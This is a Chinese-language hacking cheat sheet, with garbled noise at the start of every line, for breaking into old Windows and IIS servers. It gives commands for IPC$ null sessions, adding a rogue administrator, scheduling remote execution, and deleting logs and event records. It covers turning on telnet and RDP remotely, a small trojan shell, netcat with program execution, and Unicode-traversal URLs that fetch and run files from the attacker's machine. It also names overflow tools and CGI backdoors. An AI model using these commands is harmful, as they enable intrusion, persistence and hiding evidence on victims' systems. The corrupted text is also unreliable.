网管和黑客都必须知道的命令
a,en8�+r�] 常用的几条NET命令:
�#JX|S'�\x 0j-F6a*p'1 (与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:""
1q;I7_{ 2� 8��53]C�K< (以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator"
+_vm\]4��� �?S;et�2f (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$
~:'gv��R;x J
t��n&o"C (查看远程主机时间) net time \\IP地址
Gl�3 `e&7� ee�__3>H"/ (定时启动某个程序) at \\IP地址 02:18 readme.exe
rd f85%�%7 s.k��`];wo (查看共享) net view \\IP地址
�_rWTw+�
L x`j_�d:C~G (查看netbios工作组列表) nbtstat -A IP地址
AmUe0CQ:k' K6��PC&+�x (将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator"
8�tr�m�`?> bCe[nmE�2� (这两条把自己增加到管理员组): net user 用户名 密码 /add
o�W\Q>c7
= x�3:����ZB net localgroup Administrators 用户名 /add
#,Fx@3�y\a �Lx4H/[$6D (断开连接) net use \\IP地址\ipc$ /delete
l,~ �N~�?� �#��UP�,;W 扫尾:
�5VY%o8xXa -NI@xJO4(; del C:\winnt\system32\logfiles\*.*
Y6[�]�w�UJ DU*H��ni�i del C:\winnt\ssytem32\config\*.evt
�m�-&��a~l (RI>aDG�RH del C:\winnt\system32\dtclog\*.*
��'Px�L�^� }K qw\�]` del C:\winnt\system32\*.log
�qr�ORP3D@ }VJ hw�*s� del C:\winnt\system32\*.txt
Ezo"� ���f �kG�~ivB}x del C:\winnt\*.txt
"X!_37kQ�� �J�}93u(T5 del C:\winnt\*.log
�~h~r]tV*+ ZFd{q)qe � 一、netsvc.exe
g�
tSHy*3] g]TI8&tP!L 下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务:
1�23-i,epg P���dE)m�/ netsvc /list \\IP地址
�d�zk?Zg�� a'L7y�%��� netsvc schedule \\IP地址 /query
��:�W1tIB �d<^��6hF� netsvc \\IP地址 schedule /start
8?]�%Q�i�� UVvt&=+�4� 二、OpenTelnet.exe
_�s�=P�k[e ZS
�7)(j$. 远程启动主机的Telnet服务,并绑定端口到7878,例如:
))we�\I__8 ygu?�w�7� OpenTelnet \\IP地址 用户名 密码 1 7878
�V�o58Nz:% !'UsC6�Y4� 然后就可以telnet到主机的7878端口,进入DOS方式下:
Iclan\q#y� 'TEw�U0�<% telnet IP地址 7878
.Jnp{T��et WA)lk>�(+ 三、winshell.exe
2{Lc^6i(t� �vb4G_�X0S 一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令:
q@=#`74�6e !1�5@M|,OL p Path (查看winshell主程序的路径信息)
S7\jR%p��b ��M4$4D��? b reBoot (重新启动机器)
��K�k"B501 iJ~iJ'vf�� d shutDown (关闭机器)
|cBF-�K�NZ ;/]c^y���� s Shell (执行后你就会看到可爱的“C:\>”)
u9[w~���U# |Z �+E(�F x eXit (退出本次登录会话,此命令并不终止winshell的运行)
���pRyS8'� ::h02,y;1% CMD>
http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上)
�Ts�?>"@�� �5w�-G]�b� 四、3389登陆器,GUI方式登录远程主机的
KfI$'F
#"/ 3hpz.ISk�� 五、elsave.exe
�E��t[QcB3 I n%�yMH8� 事件日志清除工具
1Y"y�!\t7G G�CmVmOdKr elsave -s \\IP地址 -l "application" -C
�Z6HkQ=A64 . �KSr@�Gz elsave -s \\IP地址 -l "system" -C
_jI)!��rfb �>0G��}, S elsave -s \\IP地址 -l "security" -C
��RM=�+ZmA x��sy�pIbN 执行后成功清除应用程序日志,系统日志,安全日志
A_$Mt~qKi^ W,e�KQV<�j 六、hbulot.exe
��"�{1}�� */@bNT9BgO 开启win2kserver和winxp的3389服务
X�VK[p=cIL [�!�|d��[� hbulot [/r]
!�t�
[%'!v BsG[#4KM:� 使用/r表示安装完成后自动重起目标使设置生效。
&-�.���eu� 9�7=YF�K~* 七、nc.exe(netcat.exe)
~+�NFWNgN N4JL.(m){I 一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。
7�'�l{�I'Z �x#xO {�� 想要连接到某处: nc [-options] hostname port[s] [ports] ...
?p�\II7��� _-�2n3p��y 绑定端口等待连接: nc -l -p port [-options] [hostname] [port]
�_|V�+["IS V,%5�
hl'& 参数:
<�EE+
�S#z �4%�.�2��= -e prog 程序重定向,一旦连接,就执行 [危险!!]
yeh �a�dm\ k�*+��ZLrT -g gateway source-routing hop point[s], up to 8
�G"R>�a��w `x^,�k%
:4 -G num source-routing pointer: 4, 8, 12, ...
?z36mj�"`o i �/�U{dzZ -h 帮助信息
t�
1��'o�r ##\�Z�uJ^- -i secs 延时的间隔
+_K�;Pj]�x M��nsW�B�[ -l 监听模式,用于入站连接
v�-]-�wNqT rs�j}��hS$ -n 指定数字的IP地址,不能用hostname
�JqhVD@1{� a-A�4xL.gm -o file 记录16进制的传输
761"S@tf$} �)e�jqE6'[ -p port 本地端口号
r}M4()�9�L Lf�S�U��Y -r 任意指定本地及远程端口
�KQI�}�� 5 �RIpq/^Th� -s addr 本地源地址
~8 a>D<�b �@G-�k]IWi -u UDP模式
�aNEy1-/(\ RJm8K,�3�# -v 详细输出——用两个-v可得到更详细的内容
�5nw9zW
:' �u�>K�vub� -w secs timeout的时间
?ew]i'��9( �J��A�2��} -z 将输入输出关掉——用于扫描时
^bw~$*"j�# 八、TFTPD32.EXE
vX���)Y%I -5*;J&.�� 把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如:
^�x#R��U�v F��476"�WF http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名
�^mb*w)-p? JO$]t|�I�� 然后可以直接令文件运行:
|�?Uc:�VFF B_G7�F[/K� http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名
���Zu���V ��\)
O�Ny9 九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。
!f2>6}�h�E ]$*_2V3VA$ 一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。
D#AxgF_�He +:8YMM#9V� 一、一 Xscan命令行运行参数说明:
3W
W�xp�TU 1j-i �n�j` 在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。
h$h`XBVZe; f
}e7g d]M 1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项]
*wx�^�mB9� +�Rd{ ?)2~ xscan -file <主机列表文件名> <检测项目> [其他选项]
[vT,z��M�
t`D@�bzLC% 其中<检测项目> 含义如下:
f}�uCiV!?v �B��nc���� -port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表);
89dC
bF3�b �AH�,F[�vS -ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
;]�e�w>�P) FC�Au%lvZT -ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件);
AV`�7>�@
FNO
l�R>0e -cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�7q1l9:VYE 1�T`"�/*�! -iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案);
�q�/�zdd3a �1T�kdr�2 [其他选项] 含义如下:
9�_dsiM7CT :CHd\."%+1 -v: 显示详细扫描进度
l���O@Ba;x NP�/2�g�jp -p: 跳过Ping不通的主机
51us�i�O�q :�S2MS{>Mo -o: 跳过没有检测到开放端口的主机
eT�?L�MBn\ +t6m>�IB�u -t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
